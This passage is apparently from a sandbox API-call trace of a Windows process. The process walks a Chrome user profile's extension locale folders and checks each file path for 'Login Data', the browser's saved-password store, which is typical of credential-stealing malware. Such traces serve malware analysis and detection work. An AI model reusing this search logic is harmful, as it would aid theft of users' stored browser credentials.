Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.586] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.586] lstrlenW (lpString="pt_BR") returned 5 [0161.586] GetProcessHeap () returned 0x8e0000 [0161.586] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11a) returned 0x925dd8 [0161.586] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.586] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="pt_BR" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR" [0161.586] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.586] GetProcessHeap () returned 0x8e0000 [0161.586] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.586] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR") returned 140 [0161.586] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR") returned 140 [0161.586] lstrlenW (lpString="\\*.*") returned 4 [0161.586] GetProcessHeap () returned 0x8e0000 [0161.586] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x122) returned 0x91a0a8 [0161.586] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR" [0161.586] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\*.*" [0161.586] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ab50b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85ab50b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85ab50b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.586] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.586] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ab50b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85ab50b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85ab50b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.586] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.587] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.587] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85ab50b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85ab6050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xde, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.587] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR") returned 140 [0161.587] lstrlenW (lpString="\\") returned 1 [0161.587] GetProcessHeap () returned 0x8e0000 [0161.587] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91b1e0 [0161.587] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR" [0161.587] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\" [0161.587] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\") returned 141 [0161.587] lstrlenW (lpString="messages.json") returned 13 [0161.587] GetProcessHeap () returned 0x8e0000 [0161.587] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x136) returned 0x91b308 [0161.587] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\" [0161.587] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json" [0161.587] VirtualQuery (in: lpAddress=0x91b1e0, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.587] GetProcessHeap () returned 0x8e0000 [0161.587] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1e0 | out: hHeap=0x8e0000) returned 1 [0161.587] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_BR\\messages.json", lpSrch="Login Data") returned 0x0 [0161.587] VirtualQuery (in: lpAddress=0x91b308, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.587] GetProcessHeap () returned 0x8e0000 [0161.587] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b308 | out: hHeap=0x8e0000) returned 1 [0161.587] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85ab50b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85ab6050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xde, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.587] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.587] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.587] GetProcessHeap () returned 0x8e0000 [0161.587] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.587] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.587] GetProcessHeap () returned 0x8e0000 [0161.587] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.587] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ab50b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85ab50b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85ab50b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="pt_PT", cAlternateFileName="")) returned 1 [0161.587] lstrcmpiW (lpString1="pt_PT", lpString2=".") returned 1 [0161.587] lstrcmpiW (lpString1="pt_PT", lpString2="..") returned 1 [0161.587] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.588] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.588] lstrlenW (lpString="\\") returned 1 [0161.588] GetProcessHeap () returned 0x8e0000 [0161.588] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.588] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.588] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.588] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.588] lstrlenW (lpString="pt_PT") returned 5 [0161.588] GetProcessHeap () returned 0x8e0000 [0161.588] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11a) returned 0x925dd8 [0161.588] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.588] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="pt_PT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT" [0161.588] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.588] GetProcessHeap () returned 0x8e0000 [0161.588] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.588] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT") returned 140 [0161.588] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT") returned 140 [0161.588] lstrlenW (lpString="\\*.*") returned 4 [0161.588] GetProcessHeap () returned 0x8e0000 [0161.588] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x122) returned 0x91a0a8 [0161.588] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT" [0161.588] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\*.*" [0161.588] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ab50b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85ab50b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85ab50b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.589] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.589] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85ab50b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85ab50b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85ab50b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.589] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.589] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.589] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85ab50b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85ab6050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.589] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT") returned 140 [0161.589] lstrlenW (lpString="\\") returned 1 [0161.589] GetProcessHeap () returned 0x8e0000 [0161.589] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91b1e0 [0161.589] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT" [0161.589] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\" [0161.589] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\") returned 141 [0161.589] lstrlenW (lpString="messages.json") returned 13 [0161.589] GetProcessHeap () returned 0x8e0000 [0161.589] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x136) returned 0x91b308 [0161.589] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\" [0161.589] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json" [0161.589] VirtualQuery (in: lpAddress=0x91b1e0, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.589] GetProcessHeap () returned 0x8e0000 [0161.589] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1e0 | out: hHeap=0x8e0000) returned 1 [0161.589] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json", lpSrch="Login Data") returned 0x0 [0161.590] VirtualQuery (in: lpAddress=0x91b308, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.590] GetProcessHeap () returned 0x8e0000 [0161.590] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b308 | out: hHeap=0x8e0000) returned 1 [0161.590] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85ab50b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85ab6050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.590] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.590] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, 